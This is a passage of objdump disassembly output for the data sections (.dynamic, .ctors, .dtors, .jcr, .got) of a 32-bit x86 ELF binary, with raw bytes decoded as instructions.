8049857: 73 68 jae 80498c1 <_DYNAMIC+0x65> 8049859: 00 00 add %al,(%eax) ... Disassembly of section .dynamic: 0804985c <_DYNAMIC>: 804985c: 01 00 add %eax,(%eax) 804985e: 00 00 add %al,(%eax) 8049860: 01 00 add %eax,(%eax) 8049862: 00 00 add %al,(%eax) 8049864: 0c 00 or $0x0,%al 8049866: 00 00 add %al,(%eax) 8049868: 0c 83 or $0x83,%al 804986a: 04 08 add $0x8,%al 804986c: 0d 00 00 00 18 or $0x18000000,%eax 8049871: 87 04 08 xchg %eax,(%eax,%ecx,1) 8049874: 04 00 add $0x0,%al 8049876: 00 00 add %al,(%eax) 8049878: 28 81 04 08 05 00 sub %al,0x50804(%ecx) 804987e: 00 00 add %al,(%eax) 8049880: 18 82 04 08 06 00 sbb %al,0x60804(%edx) 8049886: 00 00 add %al,(%eax) 8049888: 68 81 04 08 0a push $0xa080481 804988d: 00 00 add %al,(%eax) 804988f: 00 74 00 00 add %dh,0x0(%eax,%eax,1) 8049893: 00 0b add %cl,(%ebx) 8049895: 00 00 add %al,(%eax) 8049897: 00 10 add %dl,(%eax) 8049899: 00 00 add %al,(%eax) 804989b: 00 15 00 00 00 00 add %dl,0x0 80498a1: 00 00 add %al,(%eax) 80498a3: 00 03 add %al,(%ebx) 80498a5: 00 00 add %al,(%eax) 80498a7: 00 38 add %bh,(%eax) 80498a9: 99 cltd 80498aa: 04 08 add $0x8,%al 80498ac: 02 00 add (%eax),%al 80498ae: 00 00 add %al,(%eax) 80498b0: 40 inc %eax 80498b1: 00 00 add %al,(%eax) 80498b3: 00 14 00 add %dl,(%eax,%eax,1) 80498b6: 00 00 add %al,(%eax) 80498b8: 11 00 adc %eax,(%eax) 80498ba: 00 00 add %al,(%eax) 80498bc: 17 pop %ss 80498bd: 00 00 add %al,(%eax) 80498bf: 00 cc add %cl,%ah 80498c1: 82 (bad) 80498c2: 04 08 add $0x8,%al 80498c4: 11 00 adc %eax,(%eax) 80498c6: 00 00 add %al,(%eax) 80498c8: c4 82 04 08 12 00 les 0x120804(%edx),%eax 80498ce: 00 00 add %al,(%eax) 80498d0: 08 00 or %al,(%eax) 80498d2: 00 00 add %al,(%eax) 80498d4: 13 00 adc (%eax),%eax 80498d6: 00 00 add %al,(%eax) 80498d8: 08 00 or %al,(%eax) 80498da: 00 00 add %al,(%eax) 80498dc: fe (bad) 80498dd: ff (bad) 80498de: ff 6f a4 ljmp *0xffffffa4(%edi) 80498e1: 82 (bad) 80498e2: 04 08 add $0x8,%al 80498e4: ff (bad) 80498e5: ff (bad) 80498e6: ff 6f 01 ljmp *0x1(%edi) 80498e9: 00 00 add %al,(%eax) 80498eb: 00 f0 add %dh,%al 80498ed: ff (bad) 80498ee: ff 6f 8c ljmp *0xffffff8c(%edi) 80498f1: 82 (bad) 80498f2: 04 08 add $0x8,%al ... Disassembly of section .ctors: 08049924 <__CTOR_LIST__>: 8049924: ff (bad) 8049925: ff (bad) 8049926: ff (bad) 8049927: ff 00 incl (%eax) 08049928 <__CTOR_END__>: 8049928: 00 00 add %al,(%eax) ... Disassembly of section .dtors: 0804992c <__DTOR_LIST__>: 804992c: ff (bad) 804992d: ff (bad) 804992e: ff (bad) 804992f: ff 00 incl (%eax) 08049930 <__DTOR_END__>: 8049930: 00 00 add %al,(%eax) ... Disassembly of section .jcr: 08049934 <__JCR_END__>: 8049934: 00 00 add %al,(%eax) ... Disassembly of section .got: 08049938 <_GLOBAL_OFFSET_TABLE_>: 8049938: 5c pop %esp 8049939: 98 cwtl 804993a: 04 08 add $0x8,%al ... 8049944: 3a 83 04 08 4a 83 cmp 0x834a0804(%ebx),%al 804994a: 04 08 add $0x8,%al 804994c: 5a pop %edx 804994d: 83 04 08 6a addl $0x6a,(%eax,%ecx,1) 8049951: 83 04 08 7a addl $0x7a,(%eax,%ecx,1) 8049955: 83 04 08 8a addl $0xffffff8a,(%eax,%ecx,1) 8049959: 83 04 08 9a addl $0xffffff9a,(%eax,%ecx,1) 804995d: 83 04 08 aa addl $0xffffffaa,(%eax,%ecx,1) 8049961: 83 04 08 00 addl $0x0,(%eax,%ecx,1) 8049965: 00 00 add %al,(%eax) ...